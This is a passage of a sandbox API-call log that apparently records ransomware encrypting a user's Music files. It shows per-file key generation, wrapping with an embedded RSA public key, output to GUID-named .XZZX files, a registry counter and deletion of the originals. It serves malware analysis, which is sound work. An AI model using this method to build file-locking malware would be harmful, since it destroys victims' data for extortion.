lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0050.551] SetFilePointer (in: hFile=0x604, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1fd [0050.551] WriteFile (in: hFile=0x604, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x16, lpOverlapped=0x0) returned 1 [0050.551] SetFilePointer (in: hFile=0x604, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x213 [0050.551] WriteFile (in: hFile=0x604, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0050.551] SetFilePointer (in: hFile=0x604, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x218 [0050.551] SetErrorMode (uMode=0x1) returned 0x1 [0050.551] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0050.551] OutputDebugStringW (lpOutputString="end") [0050.552] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w Rä\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0050.552] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0050.552] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x3e43530) returned 1 [0050.552] CryptImportPublicKeyInfo (in: hCryptProv=0x3e43530, dwCertEncodingType=0x1, pInfo=0x42e0fc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e0ff0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e0ff8*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x3e283b8) returned 1 [0050.552] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0050.553] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0050.553] CryptEncrypt (in: hKey=0x3e283b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0050.553] CryptEncrypt (in: hKey=0x3e283b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e435b8*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e435b8*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0050.553] WriteFile (in: hFile=0x604, lpBuffer=0x3e435b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e435b8*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0050.553] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0050.553] WriteFile (in: hFile=0x604, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0050.553] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0050.554] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0050.554] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x608) returned 0x0 [0050.554] RegQueryValueExW (in: hKey=0x608, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x56, lpcbData=0x417dfdc*=0x4) returned 0x0 [0050.554] RegCloseKey (hKey=0x608) returned 0x0 [0050.554] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x608) returned 0x0 [0050.554] RegSetValueExW (in: hKey=0x608, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x57, cbData=0x4 | out: lpData=0x417dfec*=0x57) returned 0x0 [0050.554] RegCloseKey (hKey=0x608) returned 0x0 [0050.554] VirtualFree (lpAddress=0x3eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0050.555] VirtualFree (lpAddress=0x3ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0050.555] CloseHandle (hObject=0x604) returned 1 [0050.556] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0050.556] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0050.556] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini")) returned 1 [0050.557] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini")) returned 0 Thread: id = 182 os_tid = 0xb10 [0050.152] lstrcpyA (in: lpString1=0x47cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0050.152] lstrcpyW (in: lpString1=0x47cf460, lpString2="ImbzlHSAeRD0mYdABk.mp3" | out: lpString1="ImbzlHSAeRD0mYdABk.mp3") returned="ImbzlHSAeRD0mYdABk.mp3" [0050.152] lstrcpyW (in: lpString1=0x47ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0050.152] SetErrorMode (uMode=0x1) returned 0x1 [0050.152] lstrcpyW (in: lpString1=0x47cf860, lpString2="ImbzlHSAeRD0mYdABk.mp3" | out: lpString1="ImbzlHSAeRD0mYdABk.mp3") returned="ImbzlHSAeRD0mYdABk.mp3" [0050.152] CoCreateGuid (in: pguid=0x47ce440 | out: pguid=0x47ce440*(Data1=0xbff35cf7, Data2=0x1cea, Data3=0x4c86, Data4=([0]=0x86, [1]=0x40, [2]=0xf9, [3]=0x42, [4]=0xe2, [5]=0x4f, [6]=0x2d, [7]=0x9e))) returned 0x0 [0050.152] wsprintfW (in: param_1=0x47cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ImbzlHSAeRD0mYdABk.mp3") returned 62 [0050.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x47cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0050.152] wsprintfW (in: param_1=0x47ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\129DFDC608A49A7CBFF35CF70D217EC4.XZZX") returned 77 [0050.152] StrStrW (lpFirst="ImbzlHSAeRD0mYdABk.mp3", lpSrch="XZZX") returned 0x0 [0050.152] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ImbzlHSAeRD0mYdABk.mp3", dwFileAttributes=0x20) returned 1 [0050.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ImbzlHSAeRD0mYdABk.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\imbzlhsaerd0mydabk.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0050.153] ReadFile (in: hFile=0x5cc, lpBuffer=0x4304348, nNumberOfBytesToRead=0x12b27, lpNumberOfBytesRead=0x47ce418, lpOverlapped=0x0 | out: lpBuffer=0x4304348*, lpNumberOfBytesRead=0x47ce418*=0x12b27, lpOverlapped=0x0) returned 1 [0050.153] CloseHandle (hObject=0x5cc) returned 1 [0050.153] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0050.154] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0050.154] SetErrorMode (uMode=0x1) returned 0x1 [0050.154] lstrcpyW (in: lpString1=0x47ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0050.154] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e43178) returned 1 [0050.156] CryptGenKey (in: hProv=0x3e43178, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e28438) returned 1 [0050.719] CryptExportKey (in: hKey=0x3e28438, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x47ce41c | out: pbData=0x0*, pdwDataLen=0x47ce41c*=0x94) returned 1 [0050.719] CryptExportKey (in: hKey=0x3e28438, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x47ce41c | out: pbData=0x3ea0000*, pdwDataLen=0x47ce41c*=0x94) returned 1 [0050.719] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0050.720] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0050.720] CryptDestroyKey (hKey=0x3e28438) returned 1 [0050.720] CryptReleaseContext (hProv=0x3e43640, dwFlags=0x0) returned 0 [0050.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\129DFDC608A49A7CBFF35CF70D217EC4.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\129dfdc608a49a7cbff35cf70d217ec4.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0050.720] WriteFile (in: hFile=0x610, lpBuffer=0x4304348*, nNumberOfBytesToWrite=0x12b27, lpNumberOfBytesWritten=0x47ce438, lpOverlapped=0x0 | out: lpBuffer=0x4304348*, lpNumberOfBytesWritten=0x47ce438*=0x12b27, lpOverlapped=0x0) returned 1 [0050.722] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x12b27 [0050.722] WriteFile (in: hFile=0x610, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x47ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x47ce438*=0x5, lpOverlapped=0x0) returned 1 [0050.722] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x12b2c [0050.722] WriteFile (in: hFile=0x610, lpBuffer=0x47cf860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x47ce438, lpOverlapped=0x0 | out: lpBuffer=0x47cf860*, lpNumberOfBytesWritten=0x47ce438*=0x2c, lpOverlapped=0x0) returned 1 [0050.722] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x12b58 [0050.722] WriteFile (in: hFile=0x610, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x47ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x47ce438*=0x5, lpOverlapped=0x0) returned 1 [0050.722] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x12b5d [0050.722] SetErrorMode (uMode=0x1) returned 0x1 [0050.722] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0050.722] OutputDebugStringW (lpOutputString="end") [0050.723] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ|\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x47cdbf4, pcbBinary=0x47cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x47cdbf4, pcbBinary=0x47cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0050.723] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x47cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x47cd3dc, pcbStructInfo=0x47cd3d8 | out: pvStructInfo=0x47cd3dc, pcbStructInfo=0x47cd3d8) returned 1 [0050.723] CryptAcquireContextW (in: phProv=0x47cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x47cd3e4*=0x3e436c8) returned 1 [0050.723] CryptImportPublicKeyInfo (in: hCryptProv=0x3e436c8, dwCertEncodingType=0x1, pInfo=0x42e1090*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e10c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e10c8*, PublicKey.cUnusedBits=0x0), phKey=0x47cd3ec | out: phKey=0x47cd3ec*=0x3e28438) returned 1 [0050.724] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0050.724] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0050.724] CryptEncrypt (in: hKey=0x3e28438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x47cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x47cd3f0*=0x80) returned 1 [0050.724] CryptEncrypt (in: hKey=0x3e28438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e43750*, pdwDataLen=0x47cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e43750*, pdwDataLen=0x47cd3e8*=0x80) returned 1 [0050.725] WriteFile (in: hFile=0x610, lpBuffer=0x3e43750*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x47ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e43750*, lpNumberOfBytesWritten=0x47ce438*=0x80, lpOverlapped=0x0) returned 1 [0050.725] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0050.725] WriteFile (in: hFile=0x610, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x47ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x47ce438*=0x5, lpOverlapped=0x0) returned 1 [0050.725] GetUserNameW (in: lpBuffer=0x47ce1f8, pcbBuffer=0x47cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x47cdfe0) returned 1 [0050.725] wsprintfW (in: param_1=0x47cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0050.725] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x47cdfe4 | out: phkResult=0x47cdfe4*=0x614) returned 0x0 [0050.725] RegQueryValueExW (in: hKey=0x614, lpValueName="E1010314", lpReserved=0x0, lpType=0x47cdfd8, lpData=0x47cdfec, lpcbData=0x47cdfdc*=0x4 | out: lpType=0x47cdfd8*=0x4, lpData=0x47cdfec*=0x57, lpcbData=0x47cdfdc*=0x4) returned 0x0 [0050.725] RegCloseKey (hKey=0x614) returned 0x0 [0050.725] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x47cdfe8 | out: phkResult=0x47cdfe8*=0x614) returned 0x0 [0050.725] RegSetValueExW (in: hKey=0x614, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x47cdfec*=0x58, cbData=0x4 | out: lpData=0x47cdfec*=0x58) returned 0x0 [0050.725] RegCloseKey (hKey=0x614) returned 0x0 [0050.726] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0050.726] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0050.726] CloseHandle (hObject=0x610) returned 1 [0050.728] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0050.729] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0050.729] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ImbzlHSAeRD0mYdABk.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\imbzlhsaerd0mydabk.mp3")) returned 1 [0050.730] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ImbzlHSAeRD0mYdABk.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\imbzlhsaerd0mydabk.mp3")) returned 0 Thread: id = 183 os_tid = 0xae8 [0050.280] lstrcpyA (in: lpString1=0x4bcfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0050.280] lstrcpyW (in: lpString1=0x4bcf460, lpString2="JKoqX.wav" | out: lpString1="JKoqX.wav") returned="JKoqX.wav" [0050.280] lstrcpyW (in: lpString1=0x4bce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0050.280] SetErrorMode (uMode=0x1) returned 0x1 [0050.280] lstrcpyW (in: lpString1=0x4bcf860, lpString2="JKoqX.wav" | out: lpString1="JKoqX.wav") returned="JKoqX.wav" [0050.280] CoCreateGuid (in: pguid=0x4bce440 | out: pguid=0x4bce440*(Data1=0xa81d33d0, Data2=0xc10e, Data3=0x4f6f, Data4=([0]=0x82, [1]=0xbe, [2]=0x5f, [3]=0x99, [4]=0x95, [5]=0x24, [6]=0x70, [7]=0x4b))) returned 0x0 [0050.280] wsprintfW (in: param_1=0x4bcec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\JKoqX.wav") returned 49 [0050.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x4bcfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0050.280] wsprintfW (in: param_1=0x4bce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\35A8A5603BE70712A81D33D040A3EB5A.XZZX") returned 77 [0050.280] StrStrW (lpFirst="JKoqX.wav", lpSrch="XZZX") returned 0x0 [0050.280] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\JKoqX.wav", dwFileAttributes=0x20) returned 1 [0050.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\JKoqX.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jkoqx.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c4 [0050.281] ReadFile (in: hFile=0x5c4, lpBuffer=0x4316e78, nNumberOfBytesToRead=0x100d1, lpNumberOfBytesRead=0x4bce418, lpOverlapped=0x0 | out: lpBuffer=0x4316e78*, lpNumberOfBytesRead=0x4bce418*=0x100d1, lpOverlapped=0x0) returned 1 [0050.282] CloseHandle (hObject=0x5c4) returned 1 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3ed0000 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ee0000 [0050.283] SetErrorMode (uMode=0x1) returned 0x1 [0050.283] lstrcpyW (in: lpString1=0x4bce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0050.283] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e43310) returned 1 [0050.286] CryptGenKey (in: hProv=0x3e43310, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e284b8) returned 1 [0051.625] CryptExportKey (in: hKey=0x3e284b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x4bce41c | out: pbData=0x0*, pdwDataLen=0x4bce41c*=0x94) returned 1 [0051.626] CryptExportKey (in: hKey=0x3e284b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ee0000, pdwDataLen=0x4bce41c | out: pbData=0x3ee0000*, pdwDataLen=0x4bce41c*=0x94) returned 1 [0051.626] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0051.626] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0051.626] CryptDestroyKey (hKey=0x3e284b8) returned 1 [0051.626] CryptReleaseContext (hProv=0x3e43970, dwFlags=0x0) returned 0 [0051.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\35A8A5603BE70712A81D33D040A3EB5A.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\35a8a5603be70712a81d33d040a3eb5a.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x614 [0051.627] WriteFile (in: hFile=0x614, lpBuffer=0x4316e78*, nNumberOfBytesToWrite=0x100d1, lpNumberOfBytesWritten=0x4bce438, lpOverlapped=0x0 | out: lpBuffer=0x4316e78*, lpNumberOfBytesWritten=0x4bce438*=0x100d1, lpOverlapped=0x0) returned 1 [0051.628] SetFilePointer (in: hFile=0x614, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x100d1 [0051.629] WriteFile (in: hFile=0x614, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x4bce438, lpOverlapped=0x0 | out: 